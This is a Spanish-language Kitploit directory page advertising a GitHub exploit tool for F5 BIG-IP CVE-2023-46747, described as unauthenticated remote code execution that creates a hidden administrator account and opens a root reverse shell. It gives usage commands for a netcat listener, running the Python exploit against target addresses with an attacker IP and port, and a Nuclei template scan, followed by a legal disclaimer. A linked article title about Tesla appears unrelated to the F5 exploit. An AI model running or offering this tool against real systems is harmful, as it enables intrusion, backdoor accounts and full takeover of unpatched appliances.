Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
F5-BIG-IP-SmuggleShell-CVE-2023-46747-Exploit — #F5-BIG-IP-CVE-2023-46747-Exploit – RCE no autenticado Exploit en Python y plantilla Nuclei por Raguraman ✓ Shell reversa TCP automatizada (LHOST/LPORT) ✓ Probado en BIG-IP afectados 13.x–17.x ⚠️ Solo para pruebas de penetración autorizadas | Kitploit
Herramientas/GitHubGitHub/razzlemouse/f5-big-ip-smuggleshell-cve-2023-46747-exploit
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubrazzlemouse/f5-big-ip-smuggleshell-cve-2023-46747-exploit

F5-BIG-IP-SmuggleShell-CVE-2023-46747-Exploit

#F5-BIG-IP-CVE-2023-46747-Exploit – RCE no autenticado Exploit en Python y plantilla Nuclei por Raguraman ✓ Shell reversa TCP automatizada (LHOST/LPORT) ✓ Probado en BIG-IP afectados 13.x–17.x ⚠️ Solo para pruebas de penetración autorizadas

Ver Repositorio
41hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

F5 BIG-IP CVE-2023-46747 – RCE sin autenticación + Shell inversa

Versiones para Python3 y Nuclei – por raguraman

RCE crítica sin autenticación (CVSS 9.8) mediante AJP + contrabando de solicitudes HTTP
Funciona en todos los BIG-IP sin parche 13.x → 17.x (incluyendo el último 17.1.0.3)
Parche: https://my.f5.com/manage/s/article/K000137353 (Nov 2023)

Artículo sobre el exploit en el mundo real: 👉 https://medium.com/@razzlemouse/how-i-discovered-an-rce-vulnerability-in-tesla-securing-a-10-000-bounty-62e725c2a6bd

Características

  • Completamente automatizado (sin pasos manuales)
  • Funciona con nombre de dominio o IP directa
  • Crea un usuario administrador oculto
  • Shell inversa TCP instantánea (root)
  • Salida limpia con credenciales + token

Archivos

  • f5-bigip-cve-2023-46747-revshell.py → Python3 independiente (recomendado)
  • CVE-2023-46747-revshell.yaml → Plantilla de Nuclei (opcional)

Uso – Python3 (más rápido y fiable)

root@kitploit:~
# 1. Inicia tu listener
nc -lvnp 4444

# 2. Ejecuta el exploit (funciona con IP o dominio)
python3 f5-bigip-cve-2023-46747-revshell.py https://192.168.10.50   YOUR_IP 4444
python3 f5-bigip-cve-2023-46747-revshell.py https://bigip.victim.com YOUR_IP 4444

# → ¡Shell root instantánea!

Uso – Plantilla de Nuclei (alternativa) Bash # 1. Edita LHOST y LPORT dentro del archivo YAML

2. Inicia el listener

nc -lvnp 4444

3. Escanea

nuclei -t CVE-2023-46747-revshell.yaml -u https://target.company.com

Advertencia legal

Esta herramienta está destinada únicamente para pruebas de seguridad autorizadas, como:

  • Compromisos de pruebas de penetración aprobados
  • Operaciones de equipo rojo con permiso por escrito
  • Investigación en un entorno de laboratorio controlado

No uses este exploit en sistemas que no te pertenezcan o para los que no tengas permiso explícito para probar. La explotación no autorizada es ilegal y puede resultar en enjuiciamiento penal.

Al usar esta herramienta, aceptas toda la responsabilidad de cumplir con las leyes aplicables. El autor no se hace responsable por cualquier mal uso o daño.

Descargar herramienta